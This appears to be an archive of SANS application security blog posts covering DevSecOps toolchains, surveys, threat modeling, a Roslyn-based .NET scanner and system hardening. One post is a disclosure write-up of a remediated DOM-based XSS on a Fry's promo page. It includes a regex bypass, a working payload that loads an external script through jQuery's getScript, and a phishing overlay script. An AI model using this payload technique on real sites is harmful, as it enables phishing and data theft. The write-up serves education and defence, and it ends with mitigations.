Exploring the DevSecOps Toolchain

 

The authors of the SANS Institute’s DEV540 Secure DevOps & Cloud Application Security course created the Secure DevOps Toolchain poster to help security teams create a methodology for integrating security into the DevOps workflow. As you can see, the poster breaks DevOps down into 5 key phases and includes a massive list of open source tools to help DevOps teams level up their security.

In a new presentation titled Continuous Security: Exploring the DevSecOps Toolchain (Phases 1-2), I spend the entire hour walking the attendees through the first 2 phases of the DevOps workflow:

  • Pre-Commit: Security controls that take place as code is written and before code is checked into version control.
  • Commit: Fast, automated security controls that are invoked by continuous integration tools during the build.

I had the opportunity to present this talk at the Australia Information Security Association’s National Cyber Conference 2018 event this month in Melbourne, as well as a local SANS Community event in Sydney. For those that asked, the presentation slides can be found here:

Continuous Security: Exploring the DevSecOps Toolchain (Phases 1-2)

In the next round, we’ll pick up where we left off and explore Phases 3-4. Until then, cheers!

To learn more about DevSecOps and Cloud Security, check out the DEV540: Secure DevOps and Cloud Application Security course!
 

About the Author

 
Eric Johnson is a co-founder and principal security engineer at Puma Security focusing on modern static analysis product development and DevSecOps automation. His experience includes application security automation, cloud security reviews, static source code analysis, web and mobile application penetration testing, secure development lifecycle consulting, and secure code review assessments.

Previously, Eric spent 5 years as a principal security consultant at an information security consulting firm helping companies deliver secure products to their customers, and another 10 years as an information security engineer at a large US financial institution performing source code audits.

As a Certified Instructor with the SANS Institute, Eric authors information security courses on DevSecOps, cloud security, secure coding, and defending mobile apps. He serves on the advisory board for the SANS Security Awareness Developer training program, delivers security training around the world, and presents security research at conferences including SANS, BlackHat, OWASP, BSides, JavaOne, UberConf, and ISSA.

Eric completed a bachelor’s degree in computer engineering and a masters degree in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, GSSP-Java, and AWS Developer certifications.
 

Your Secure DevOps Questions Answered

 

As SANS prepares for the 2nd Annual Secure DevOps Summit, Co-Chairs Frank Kim and Eric Johnson are tackling some of the common questions they get from security professionals who want to understand how to inject security into the DevOps pipeline, leverage leading DevOps practices, and secure DevOps technologies and cloud services.

If you are considering attending the Secure DevOps Summit or have already registered, this post is a good warmup, as these questions will be covered in-depth at the Summit on October 22nd-23rd in Denver, CO.
 

1. What do security professionals need to do to implement Secure DevOps processes?

SecDevOps requires security and compliance teams to integrate their processes, policies, and requirements into the same workflows being used by Development & Operations. This does not happen without the Security team understanding the current development and operations engineering process, technologies, and tools.

The Continuous Integration (CI) tool, is one of the most important pieces in the DevOps process, manages the workflow, executes steps, and integrates the entire toolchain together. Common examples include Jenkins, Visual Studio Team Services (VSTS), Travis, Bamboo, TeamCity.

Leveraging the CI tool, SecDevOps teams will start to integrate important security touch points such as:

  • Pre-Commit Security Hooks – Code checkers to scan for secrets (private keys, system passwords, cloud access keys, etc.) before committing code to version control.
  • Static Source Code Scanning – Scanning source code files (infrastructure templates, application source code) for security vulnerabilities in the build pipeline.
  • Security Unit Tests – Custom security unit tests written by the security and engineering teams to provide coverage for abuser stories and negative test cases.
  • Dynamic Application Security Testing – Scanning a running application for common security vulnerabilities (OWASP Top 10) and misconfigurations and enforcing acceptance criterial using tools such as Gauntlt / BDD Security.
  • Secrets Management – Automating the provisioning and storage of secrets using tools such as Vault, Conjure, AWS KMS, Azure Key Vault.
  • Continuous Monitoring – Monitoring the production environment for vulnerabilities, anomalies, and in progress attacks using tools such as statsd, graphite, graphana, etc.

 

2. What Secure DevOps tools should I use?

The authors of the SANS Institute’s DEV540 Secure DevOps & Cloud Application Security course put together a Secure DevOps Toolchain poster. Our SecDevOps Toolchain breaks the SecDevOps process down into 5 key phases with a detailed list of associated tools.

  • Pre-Commit: Security controls that can take place before code is checked into version control.
  • Commit: Fast, automated security checks that are invoked by continuous integration tools during the build.
  • Acceptance: Automated security acceptance tests, functional tests, and out of band security scans that are invoked by continuous integration tools as artifacts are delivered to testing / staging environments.
  • Production: Security smoke tests and configuration checks that are invoked by continuous integration tools as artifacts are delivered to the production environment.
  • Operations: Continuous security monitoring, testing, auditing, and compliance checks running in production and providing feedback to SecDevOps teams.

 

3. How important is culture in an organization moving towards SecDevOps?

John Wills, Damon Edwards, and Jez Humble came up with the CALMS to understand and describe DevOps:

  • Culture – People come first
  • Automation – Rely on tools for efficiency + repeatability
  • Lean – Apply Lean engineering practices to continuously improve
  • Measurement – Use data to drive decisions and improvements
  • Sharing – Share ideas, information and goals across organizational silos

There is a reason that Culture is first on the list. DevOps creates an open, diverse working environment that enables working together to solve problems, empower teams, fail fast, and continuously improve.

Here is the biggest challenge integrating the “Sec” into “DevOps”: traditional security cultures are always ready to say “no”, fail to share information across the organization, and do not tolerate failure.

This is also evidenced in how CISOs lead their organizations and interact with development teams and the rest of the business. There are three different types of CISOs: the dictator, the collaborator, and the partner.

By saying “no” the dictator doesn’t fully consider how security introduces unnecessary friction into existing development and business processes. For SecDevOps to be successful we need to move to be more of a collaborator by understanding engineering practices, process, and tools. Even better, security leaders can become partners by understanding business goals to earn a seat at the executive table.
 

4. How do you measure the success of SecDevOps?

SecDevOps teams often measure success by monitoring change frequency, deployment success / failure rates, and the mean time to recover (MTTR) from a failure.

For the “Sec” component, assume that a vulnerability assessment or penetration test uncovers a critical patch missing from a system. How long does it take the feedback from the security team to enter the operations workflow, build a new gold image, run automated acceptance tests to validate the changes, and roll the gold image into production? Mean time to recover (MTTR) is a critical metric for measuring success.

Measuring the # of vulnerabilities discovered via automated testing in the pipeline versus vulnerabilities escaping to production. This shows the effectiveness of the pipeline and improvements over time.

Tracking the window of exposure, or how long vulnerabilities remain open in production, provides important metrics for management to see progress.

These metrics also help handle managerial issues as you ask above because can show the process working and helping make the organization more secure.
 

5. What does “Security as code” mean?

A prerequisite for automation requires all steps to be written into code and checked into version control. Development engineering teams have been writing code since the beginning. Modern operations teams are now writing “infrastructure as code” using tools like Chef, Puppet, and Ansible to create and configure cloud infrastructure, on-premise infrastructure, gold images, and network devices.

Security as code takes this approach a step further by converting manual security and compliance steps into automated, repeatable scripts that can be executed inside a CI pipeline. Security tools are quickly evolving to have APIs and command line interfaces to support “security as code” instead of manually configuring a scanner and pressing a button.

In a SecDevOps world, security tools that cannot be automated through an API or from the command line are not worth purchasing.
 

Summary

Many security teams jump in too quickly and disrupt the engineering workflows. It is important to tackle one step at a time and start slowly. Security teams must ensure new security steps are working properly, evaluate results, fine tune scanners, and minimize false positives before even considering disrupting the workflow.

To learn more about DevOps and Cloud Security, check out DEV540: Secure DevOps and Cloud Application Security!
 

About the Authors
 
Eric Johnson is a co-founder and principal security engineer at Puma Security focusing on modern static analysis product development and DevSecOps automation. His experience includes application security automation, cloud security reviews, static source code analysis, web and mobile application penetration testing, secure development lifecycle consulting, and secure code review assessments.

Previously, Eric spent 5 years as a principal security consultant at an information security consulting firm helping companies deliver secure products to their customers, and another 10 years as an information security engineer at a large US financial institution performing source code audits.

As a Certified Instructor with the SANS Institute, Eric authors information security courses on DevSecOps, cloud security, secure coding, and defending mobile apps. He serves on the advisory board for the SANS Security Awareness Developer training program, delivers security training around the world, and presents security research at conferences including SANS, BlackHat, OWASP, BSides, JavaOne, UberConf, and ISSA.

Eric completed a bachelor’s degree in computer engineering and a masters degree in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.
 


Frank Kim is the founder of ThinkSec, a security consulting and CISO advisory firm. Previously, as CISO at the SANS Institute, Frank led the information risk function for the most trusted source of computer security training and certification in the world. With the SANS Institute, Frank continues to lead the management and software security curricula, helping to develop the next generation of security leaders.

Frank was also executive director of cybersecurity at Kaiser Permanente where he built an innovative security program to meet the unique needs of the nation’s largest not-for-profit health plan and integrated health care provider with annual revenue of $60 billion, 10 million members, and 175,000 employees.

Frank holds degrees from the University of California at Berkeley and is the author and instructor of popular courses on strategic planning, leadership, application security, and DevOps. For more, visit frankkim.net.

Continuous Opportunity – DevOps and Security

 
Thank you to everyone at the Minnesota ISSA chapter for the opportunity to share some background on DevOps and some ideas about how security teams can benefit by adopting DevOps practices & tools. The presentation slides are available here:

Continuous Opportunity- DevOps and Security.

To learn more about DevOps and Cloud Security, check out the new DEV540: Secure DevOps and Cloud Application Security course!
 

About the Author
At the SANS Institute, Ben Allen works as a member of the Information Security team to protect the world’s most trusted source of computer security training, certification, and research. He applies knowledge gained through over a decade of Information Security experience to problem domains ranging from packet analysis to policy development on an ongoing basis. Ben has contributed to Security best practices for DevOps and operationalized DevOps techniques for security teams leading to improvements in release time and stability.

Prior to joining the Information Security team at SANS, Ben worked in both the operations and development teams at SANS, as a Security Engineer and Architect at the University of Minnesota, and long ago as a systems administrator for the LCSE. Ben holds numerous SANS certifications, and a Bachelor’s degree in Electrical Engineering.

2017 Application Security Survey is Live!

 
Our 2016 application security survey, led by Dr. Johannes Ullrich, saw AppSec Programs continuously improving. In this year’s 2017 survey led by Jim Bird, we will be looking at how AppSec is keeping up with rapidly increasing rates of change as organizations continue to adopt agile development techniques and DevOps.

The survey is officially live and will be open until July 21st. Take the survey now, and enter a drawing for a $400 Amazon gift card OR a free pass to the SANS Secure DevOps Summit in Denver, CO this October:

http://www.surveymonkey.com/r/2017SANSAppSecSurvey

The survey results will be presented by Eric Johnson in a webcast on Tuesday, October 24, 2017. Register for the webcast to be among the first to receive a copy of the 2017 Application Security Survey report: https://www.sans.org/webcasts/application-security-go-survey-results-105210

Taking Control of Your Application Security

 
Application security is hard. Finding the right people to perform application security work and manage the program is even harder. The application security space has twice as many job openings as candidates. Combined that with the fact that for every 200 software engineers there is only 1 security professional, how do we staff a secure software group and integrate software security across an organization?

There are many approaches for solving this problem being used across the various industry verticals. Most include hiring expensive consultants or conducting long job searches for candidates that rarely exist. Coming from a software development background personally and working with software engineers in various training / consulting engagements across the world has led me to this: capable software security engineers are already working on your engineering teams. Management just needs to put a program in place to educate, empower, and build strong application security champions.

Over the years, I’ve had this conversation with several folks from many different organizations. With many having the same questions and looking for guidance, it became clear to me that this topic would make a great talk.

I had the privilege of presenting the “Taking Control of Your Application Security” talk during an evening session at SANS Orlando 2017 last week. Of course, we had a little fun with a case study and discussed some actionable takeaways for building a culture of secure software engineering. But, most importantly I walked the audience through my journey as a software engineer to an application security consultant.

A number of attendees have asked for a copy of the slides, which can be found here: Taking Control of Your Application Security

For more information on application security training, check out the following resources:

In-Depth Online / Classroom Training: SANS Application Security Curriculum

Developer Security Awareness Training: STH.Developer Training
 
About the Author
Eric Johnson is a Principal Security Consultant at Cypress Data Defense. At Cypress, he leads web and mobile application penetration testing, secure development lifecycle consulting, secure code review assessments, static source code analysis, security research, and security tool development. Eric has presented his security research at conferences around the world including SANS, BlackHat, OWASP AppSecUSA, BSides, JavaOne, UberConf, and ISSA. He has contributed to several open source projects including Puma Scan, AWS Critical Security Control Automation, and the OWASP Secure Headers project. Eric is also a Certified Instructor with the SANS Institute where he authors several application security courses, serves on the advisory board for the SANS Securing the Human Developer awareness training program, and delivers security training around the world. Eric completed a bachelor of science in computer engineering and a master of science in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.

DOM-based XSS in the Wild


Editor’s Note: Today’s post is from Phillip Pham. Phillip is a Security Engineer at APT Security Solutions. In this post, Phillip walks through a cross-site scripting vulnerability he identified in the Fry’s web application.

Disclaimer
At the time of writing, the stated vulnerability has already been remediated by Fry’s Electronics. Thank you for taking swift action!

Background
Fry’s Electronics is a consumer electronic retail chain that has presence in various regions across the country. Fry’s Electronics introduced a marketing concept to promote sales and track consumers’ spending habits by providing personalized “Promo Code”. These codes once presented at either online and/or local store will provide shoppers additional discounts to their electronic goods.

Consumers are contacted by Fry’s Electronics marketing “bot” periodically via emails which include the aforementioned promo code (as seen in screenshot below). To view full list of discounted products, consumers are required to click on the provided link (example below) with promo code attached as a data parameter which is part of the URL.

Promotional product listing URLs
This URL is hosted by a Limelight Networks, who is a Content Delivery Network (CDN) vendor.
[sourcecode]
https://frys.hs.llnwd.net/…..?promocode=1234567%0D
[/sourcecode]

When viewing advertising materials on a mobile device.
[sourcecode]
https://images.frys.com/…?promocode=1234567%0D
[/sourcecode]

FrysSample

The Vulnerability
Web applications are often vulnerable to a commonly found attack, Cross Site Scripting (aka XSS), which leverages the lack of output encoding and input validation within a web application. The exploit allows a malicious actor (hacker) to embed JavaScript content (payloads) into the end-users browser and execute malicious code. Often, this results in phishing for users credentials, credit card information, malware distribution, and other malicious activities. Exploiting these vulnerabilities is usually fairly simple, yet yields devastating impact to end-users.

Because Fry’s Electronics marketing web site exposes the promo code via an unfiltered data parameter, “promocode”, thus creates an attack vector for XSS exploitation.

Initial Test
To confirm the Cross-Site Scripting vulnerability, a malicious payload was appended to the end of the promotion code parameter as follows:

[sourcecode]
https://frys.hs.llnwd.net/……/?promocode=1234567alert(1)
[/sourcecode]

Immediately, a popup displayed as shown in screenshot below and the vulnerability was confirmed:

FrysXss

Lets take a look at the offending code:

[sourcecode]
var promocode = getUrlParameter(‘promocode’);
var pattern = new RegExp(“[0-9]{1,7}”);
var result = pattern.test(promocode);
var default_text = “Your PromoCode for this email:”+promocode;

if(result){
$(“.prcode”).html(default_text);
}
});
[/sourcecode]

Do you see any problems here? The “promocode” value, which is partially validated on line 3, is written to the browser using the raw .html method on line 7:

Phishing Campaign
As previously mentioned, XSS allows malicious actors to conduct phishing campaigns to lure their victims to provide personal information. With given context, the phishing campaign proof-of-concept built to trick the users to provide their personal cell phone numbers to further widen attack surface to infect consumer mobile devices leverage exploits (e.g. Stagefright (Android) or an iOS 0-day).

FrysPhishing

Note: The content of the floating panel (red) is loaded from an externally hosted JavaScript file which was embedded as part of the legitimate Fry’s marketing site.

Evasions
Although, simple exploitation (alert popup) of the vulnerability requires very minimal effort. However, such exploitation does not allow a full delivery of the stated phishing campaign to the victims, thus diminishing the success rate. Upon further research and analysis of the web application HTML source code, in order to fully deliver the payload, the following series of events must take place:

  • Allow legitimate content to be completely loaded
  • Deliver externally hosted payload
  • Victims are required to provide cell phone number before able to dismiss such dialog (via floating DIV)

Evasion #1: Regular Expression Bypass
The application employs a “numbers only” validation against the actual “promocode” data parameter via client-side JavaScript (no further server-side validation):

[sourcecode]
var promocode = getUrlParameter(‘promocode’);
var pattern = new RegExp(“[0-9]{1,7}”);
var result = pattern.test(promocode);
[/sourcecode]

The regular expression above tests for numeric values of the first 7 characters which can be easily bypassed as trailing characters (starting at 8th position) will not be validated. Hence, the payload executed during our Initial Test.

Evasion #2: The equal sign (=) breaks trailing payloads
The application obtains the name and value of the promo code data parameter via the “getUrlParameter” (snippet below).

[sourcecode]
function getUrlParameter(sParam) {
var sPageURL = decodeURIComponent(window.location.search.substring(1)),
sURLVariables = sPageURL.split(‘&’),
sParameterName,
i;

for (i = 0; i < sURLVariables.length; i++) {
sParameterName = sURLVariables[i].split('=');

if (sParameterName[0] === sParam) {
return sParameterName[1] === undefined ? true : sParameterName[1];
}
}
[/sourcecode]

With current script implementation, given the payload:

[sourcecode]
?promocode=1234567/script>
[/sourcecode]

The trailing external URL will be nullified because the script detected the equal (=) sign and treated as another set of parameter/value pair. Thus yields the output:

[sourcecode]
1234567<script src
[/sourcecode]

To defeat this logic, the payload must not contain the equal (=) sign.

Evasion #3: The Working Payload
Upon further review, the application employs Google JQuery technologies to dynamically render contents. Furthermore, JQuery allows loading of external script (acting as src) via its .getScript(‘url’) method which does not require an equal sign (=). Example of using JQuery to reference external scripts below.

[sourcecode]
$.getScript(%27https://localhost/test.js%27,function(){})
[/sourcecode]

Putting it altogether
Once evasions had been fully deployed, the remaining payload is trivial, thus the following payload will allow rendering of phishing content as shown below.

[sourcecode]
?promocode=1234567%3Cscript%3E$(document).ready(function(event){$.getScript(%27https://localhost/test.js%27,function(){})});%3C/script%3E
[/sourcecode]

The evil JavaScript file (test.js) contains the following content:

[sourcecode]
var div = document.createElement(“div”);
div.style.width = “700px”;
div.style.height = “150px”;
div.style.background = “red”;
div.style.color = “white”;
div.innerHTML = “CONGRATLUATIONS…”;
div.style.position = “absolute”; //floating div
div.style.top = “20%”; //floating div
div.style.left = “20%”; //floating div
document.getElementsByTagName(‘body’)[0].appendChild(div);
[/sourcecode]

As you can see from the screenshot below, the form is injected into the page and asks the user for their phone number:

FrysPayload1

Then, pressing submit results in the the phone number being sent to the evil site:

FrysPayload2

Mitigation Strategies
As we have seen many times before, XSS vulnerabilities can be fixed using a combination of output encoding and input validation. Some simple mitigations are as follows:

  • This a classic DOM-based XSS vulnerability. OWASP provides a DOM-based XSS Prevention Cheat Sheet for fixing this. Short story – using an encoding library (e.g. jQuery Encoder) to HTML encode the promo code before writing it to the page
  • Fix the validation routine to check the entire input value

For more information on defending applications, check out the awesome courses available in SANS Application Security curriculum.

About the Author
Phillip Pham is a security engineer with a strong passion for Information Security. Phillip has worked in various sectors and for organizations of various sizes, ranging from small start-ups to Fortune 500 companies. Prior to transitioning into an Information Security career, Phillip spent ten years in software engineering. His last five years of Information Security experience have been focused on Application Security. Some of his application security assessment strengths (both onpremise and cloudbased) include web applications, web services, APIs, Windows client applications, and mobile applications. He currently holds a GCIH certification and is cofounder of APT Security Solutions. Follow Phillip on Twitter @philaptsec.

Threat Modeling: A Hybrid Approach


Editor’s Note: Today’s post is from Sriram Krishnan. Sriram is a Security Architect at Pegasystems. In this post, Sriram introduces a hybrid threat modeling white paper addressing the limitations in traditional threat modeling methodologies.

In the face of increasing attacks at the application layer and enterprise applications moving towards the cloud, organizations must look at security not as just a function, but a key business driver. It goes without saying that it is the inherent responsibility of organizations to provide a secure operating environment for their customers and employees to protect their interest. Understanding the threat landscape is an important prerequisite for building secure applications. Unless people developing the software applications are aware of the threats that their applications exposed to in production, it is not possible to build secure applications. A SANS survey (2015 State of Application Security: Closing the Gap) indicates that threat assessment (which can also be referred to as threat modeling) is the second leading application security practice (next to penetration testing) for building secure web applications. This helps prove that threat modeling is a fundamental building block for building secure software.

Threat Modeling should be viewed as a pro-active security practice to identify security weakness in software applications early Software Development Lifecycle phase. This enables software developers to build software applications by understanding associated threats. There are various techniques published for performing threat modeling such as STRIDE, Attack Tree, and Attack Library. Organizations tend to be prejudiced towards a particular technique while performing threat modeling exercise. However these techniques have their own advantage and limitations in real-world implementation.

The STRIDE technique may be good in enumerating the threats, however STRIDE does not aid in developing countermeasures and mitigation plans. Attack Tree provides an overview about the attack surface at some level of abstraction, which results in not capturing data essential for understanding the threat scenario. Finally, Attack Library may provide information about the attack vectors and be suitable as checklist model, but does not contribute to a complete threat model. When implemented as separate techniques, some of the key aspects required for threat modeling may be missed, thus impacting the productivity and comprehensiveness of the exercise.
To reap the complete benefit of threat modeling, I propose utilizing a combination of modeling techniques to perform the various activities or tasks involved in the threat modeling process. This hybrid model eliminates limitations by adopting a structured approach, capturing optimum details, and representing the data in an intelligible way.

The following white paper analyses the various limitations of the STRIDE, Attack Tree, and Attack Library methodologies and presents a hybrid model that would implement the best techniques from each option.

A Hybrid Approach to Threat Modeling

I have also created a github project that contains a Threat Modeling Template for project teams to use as they get started:

Threat Modeling

About the Author
Sriram Krishnan (@sriramk21) is a cyber security professional with 12 years of experience, currently working as a Security Architect at Pegasystems Worldwide. He has worked with a leading internet service provider, big 4 consulting firm and global banks performing penetration testing, security architecture review, and advising on security best practices for global telecom industry, banking and financial services sector, and government entities.

Continuous Integration: Live Static Analysis with Roslyn

Early in 2016, I had a conversation with a colleague about the very, very limited free and open-source .NET security static analysis options. We discussed CAT.NET, which released back in 2009 and hasn’t been updated since. Next came FxCop, which has a few security rules looking for SQL Injection and Cross-Site Scripting included in the Visual Studio Code Analysis Microsoft Security Rules. Plus, the various configuration analyzer tools that run checks against web.config files, such as the Web Configuration Security Analyzer (WCSA) tools written by Troy Hunt and James Jardine.

Combining these scans all together leaves .NET development teams with a few glaring problems:

  • From past experience, I know that CAT.NET and FxCop have very poor coverage of secure coding issues covered by OWASP, SANS / CWE Top 25, etc. See the presentation slides below for stats from CAT.NET and FxCop scans against a vulnerable .NET target app. The results are very concerning.
     
  • Aside from the Visual Studio Code Analysis rules, none of the tools actually run inside Visual Studio where engineers are actually writing code. This means more add-on tools that need to be run by the security / development leads, resulting in more reports to manage and import into bug tracking systems. For this reason, it is very unlikely these scans are actually run before committing code, which in my opinion is too late in the development process.

There has to be a better way, right?
 
Roslyn – The .NET Complier Platform
At the end of the conversation, my colleague asked me if I had tried writing any Roslyn rules yet? Wait, what’s Roslyn? After some quick searching, I discovered that Roslyn, aka the .NET Compiler Platform, is a set of code analysis APIs for the C# and Visual Basic compilers. Using Roslyn, Microsoft provides a way to query and report diagnostics on just about any piece of code. These diagnostic warnings are displayed in two different places:

  • Inside a code document, diagnostic warnings show as spell check style squiggles as code is being written! See the following screenshot for an example:
    Puma Scan diagnostic warning in code
     
  • In the Error List, diagnostic warnings are added to the standard list of compiler errors. Roslyn provides rule authors the ability to create custom warnings (or errors if you want to be THAT disruptive security team that slows down dev teams) in the list. See the following screenshot for an example:
    Puma Scan diagnostics added to the error list.
     

After reading Alex Turner’s MSDN Magazine article, I realized that the Roslyn team at Microsoft had provided me exactly what I needed to build a powerful, accurate secure coding engine that runs inside of Visual Studio. During development. As code is written. Before code enters the repository. Bingo!

With that, I decided to help address the gap in the lack of free .NET static analysis tools.
 
The Puma Scanner
Once we figured out the Roslyn basics, my team and I spent a small part of our consulting hours over the past 4 months learning about the various types of analyzers and building security rules. Of course we had some help, as the folks on the Roslyn team at Microsoft and the Roslyn Gitter channel are very helpful with newbie questions.

Last week, I had the pleasure of presenting our progress at the OWASP AppSec USA conference in Washington, DC. While there is a lot of work left to be done, we are happy to say that Puma Scan has roughly 40 different rules looking for insecure configuration, cross-site scripting, SQL injection, unvalidated redirects, password management, and cross-site request forgery. At this point, I am confident it is worthwhile running the scanner in your development environment and MSBuild pipeline to gain more advanced static analysis compared the free options that exist today.

If you were unable to attend AppSec USA 2016, don’t worry. The hard working volunteers at OWASP record all of the sessions, which are posted on the OWASP YouTube channel. You can watch the presentation here: Continuous Integration: Live Static Analysis using Visual Studio & the Roslyn API session.

For now, as I promised those that attended the presentation, the presentation slides are available on Slideshare. Additionally, links to the Puma Scan web site, installation instructions, rules documentation, and github repository are available below. Let me know if you’re interested in contributing to the project!

To learn more about securing your .NET applications, sign up for DEV544: Secure Coding in .NET!
 
References
Puma Scan Web Site: https://www.pumascan.com/
AppSec USA Presentation: Continuous Integration: Live Static Analysis using Visual Studio & the Roslyn API
Github Repository: https://github.com/pumasecurity
Visual Studio Extension: https://visualstudiogallery.msdn.microsoft.com/80206c43-348b-4a21-9f84-a4d4f0d85007
NuGet Package: https://www.nuget.org/packages/Puma.Security.Rules/
 
About the Author
Eric Johnson (Twitter: @emjohn20) is a Senior Security Consultant at Cypress Data Defense, Application Security Curriculum Product Manager at SANS, and a certified SANS instructor. He is an author for DEV544 Secure Coding in .NET and DEV531 Defending Mobile App Security Essentials, as well as an instructor for DEV541 Secure Coding in Java/JEE and DEV534: Secure DevOps. Eric’s experience includes web and mobile application penetration testing, secure code review, risk assessment, static source code analysis, security research, and developing security tools. He completed a bachelor of science in computer engineering and a master of science in information assurance at Iowa State University, and currently holds the CISSP, GWAPT, GSSP-.NET, and GSSP-Java certifications.

Dev-Sec.io Automated Hardening Framework

 
Editors Note: Today’s post is from Jim Bird. Jim is the co-founder and CTO of a major U.S.-based institutional trading service, where he is responsible for managing the company’s technology organization and information security program.

Automated configuration management tools like Ansible, Chef and Puppet are changing the way that organizations provision and manage their IT infrastructure. These tools allow engineers to programmatically define how systems are set up, and automatically install and configure software packages. System provisioning and configuration becomes testable, auditable, efficient, scalable and consistent, from tens to hundreds or thousands of hosts.

These tools also change the way that system hardening is done. Instead of following a checklist or a guidebook like one of the CIS Benchmarks, and manually applying or scripting changes, you can automatically enforce hardening policies or audit system configurations against recognized best practices, using pre-defined hardening rules programmed into code.

An excellent resource for automated hardening is a set of open source templates originally developed at Deutsche Telekom, under the project name “Hardening.io”. The authors have recently had to rename this hardening framework to Dev-Sec.io.

It includes Chef recipes and Puppet manifests for hardening base Linux, as well as for SSH, MySQL and PostgreSQL, Apache and Nginx. Ansible support at this time is limited to playbooks for base Linux and SSH. Dev-Sec.io works on Ubuntu, Debian, RHEL, CenOS and Oracle Linux distros.

For container security, the project team just added an InSpec profile for Chef Compliance against the CIS Docker 1.11.0 benchmark.

Dev-Sec.io is comprehensive and at the same time accessible. And it’s open, actively maintained, and free. You can review the rules, adopt them wholesale, or cherry pick or customize them if needed. It’s definitely worth your time to check it out on GitHub: https://github.com/dev-sec.

To learn more about Dev, Ops, and Security, check out the new SANS Application Security course Secure DevOps: A Practical Introduction co-authored by Jim Bird (@jimrbird) and Ben Allen (@mr_secure).

This post was originally posted by Jim Bird at http://swreflections.blogspot.com

About the Author
Jim Bird, SANS analyst and lead author of the SANS Application Security Survey series, is an active contributor to the Open Web Application Security Project (OWASP) and a popular blogger on agile development, DevOps and software security at his blog, “Building Real Software.” He is the co-founder and CTO of a major U.S.-based institutional trading service, where he is responsible for managing the company’s technology organization and information security program. Jim is an experienced software development professional and IT manager, having worked with high-integrity and high-reliability systems at stock exchanges and banks in more than 30 countries. He holds PMP, PMI-ACP, CSM, SCPM and ITIL certifications.

2016 State of Application Security: Skills, Configurations, and Components

 
The 2016 SANS State of Application Security Survey analyst paper and webcast are complete. This year, Johannes Ullrich, dean of research at the SANS Technology Institute and instructor for DEV522: Defending Web Applications Security Essentials, led the project by analyzing the survey results, writing the whitepaper, and delivering the webcast.

We had 475 respondents participate in this year’s survey, and Johannes identified the following key findings to discuss in the whitepaper:

38% have a “maturing” AppSec program

40% have documented approaches and policies to which third-party software vendors must adhere

41% name public-facing web apps as the leading cause of breaches

For more details, the webcast and whitepaper can be found here:

Whitepaper:
2016 State of Application Security: Skills, Configurations and Components

Webcast:
Managing Applications Securely: A SANS Survey

Thank you to all of the sponsors for bringing this content to the SANS community: Checkmarx, Veracode, and WhiteHat Security.

Also, a special thank you goes out to the webcast panel: Amit Ashbel (Checkmarx), Tim Jarrett (Veracode), and Ryan O’Leary (WhiteHat).

We will see you next year for the 2017 State of Application Security Survey!